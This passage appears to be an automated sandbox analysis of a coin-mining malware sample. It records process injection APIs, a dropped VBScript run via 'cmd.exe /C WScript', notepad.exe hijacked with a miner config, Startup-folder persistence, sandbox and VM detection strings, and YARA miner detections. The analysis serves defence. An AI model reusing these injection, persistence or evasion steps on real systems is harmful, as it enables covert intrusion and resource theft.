                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004037E0 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose,16_2_004037E0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004029E0 DeleteFileW,RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,Sleep,Sleep,NtWaitForSingleObject,TerminateThread,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose,16_2_004029E0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00406990 RtlDosPathNameToNtPathName_U,NtCreateFile,16_2_00406990
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004085B0 RtlInitUnicodeString,NtOpenKey,GetLastError,RtlInitUnicodeString,GetLastError,NtQueryValueKey,NtClose,NtClose,16_2_004085B0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00405420 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,16_2_00405420
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00406D50 NtClose,16_2_00406D50
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00406D70 NtClose,16_2_00406D70
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00408730 NtOpenProcess,NtTerminateProcess,NtClose,16_2_00408730
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004087C0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_004087C0
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exeCode function: String function: 01462F80 appears 35 times
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exeCode function: String function: 014616E0 appears 63 times
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: String function: 00402F80 appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: String function: 004016E0 appears 63 times
                        Source: 4rC1bQcnl5.exe, 00000000.00000003.291231944.00000000041EA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFzzisztdzkzaueisyxrosd.dllN vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325147325.0000000000D96000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325851049.00000000030B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325864568.00000000030C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325615282.0000000001460000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 0000000F.00000002.321380036.0000000000396000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.496150874.0000000000F96000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.496689113.0000000001560000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 4rC1bQcnl5.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
                        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                        Source: 4rC1bQcnl5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                        Source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                        Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                        Source: classification engineClassification label: mal100.expl.evad.mine.winEXE@25/14@2/3
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary,16_2_004080E0
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4rC1bQcnl5.exe.logJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMutant created: \Sessions\1\BaseNamedObjects\e9c1286a28d82a2d0ee6
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5196:120:WilError_01
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeFile created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: 4rC1bQcnl5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\notepad.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\notepad.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: 4rC1bQcnl5.exeVirustotal: Detection: 17%
                        Source: 4rC1bQcnl5.exeReversingLabs: Detection: 23%
                        Source: 4rC1bQcnl5.exeString found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
                        Source: 4rC1bQcnl5.exeString found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
                        Source: 4rC1bQcnl5.exeString found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
                        Source: 4rC1bQcnl5.exeString found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
                        Source: 4rC1bQcnl5.exeString found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
                        Source: 4rC1bQcnl5.exeString found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeFile read: C:\Users\user\Desktop\4rC1bQcnl5.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\4rC1bQcnl5.exe 'C:\Users\user\Desktop\4rC1bQcnl5.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: 4rC1bQcnl5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 4rC1bQcnl5.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: 4rC1bQcnl5.exeStatic file information: File size 3627520 > 1048576
                        Source: 4rC1bQcnl5.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x372800
                        Source: 4rC1bQcnl5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                        Data Obfuscation:

                        barindex
                        .NET source code contains potential unpackerShow sources
                        Source: 4rC1bQcnl5.exe, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 4rC1bQcnl5.exe.0.dr, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 0.0.4rC1bQcnl5.exe.a20000.0.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 0.2.4rC1bQcnl5.exe.a20000.0.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 15.2.4rC1bQcnl5.exe.20000.0.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 15.0.4rC1bQcnl5.exe.20000.0.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: csrss.16.dr, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 16.0.4rC1bQcnl5.exe.c20000.0.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 16.2.4rC1bQcnl5.exe.c20000.2.unpack, b.cs.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary,16_2_004080E0
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeCode function: 0_2_00A23696 pushad ; ret 0_2_00A23697
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 15_2_00023696 pushad ; ret 15_2_00023697
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00C23696 pushad ; ret 16_2_00C23697
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeFile created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 9503Jump to behavior
                        Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 492Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe TID: 776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 2372Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe TID: 5572Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe TID: 5572Thread sleep time: -72000s >= -30000sJump to behavior
                        Source: C:\Windows\notepad.exe TID: 5180Thread sleep count: 9503 > 30Jump to behavior
                        Source: C:\Windows\notepad.exe TID: 5180Thread sleep count: 492 > 30Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_00403CA0
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: svchost.exe, 00000005.00000002.497700396.0000015D39A62000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: vmware
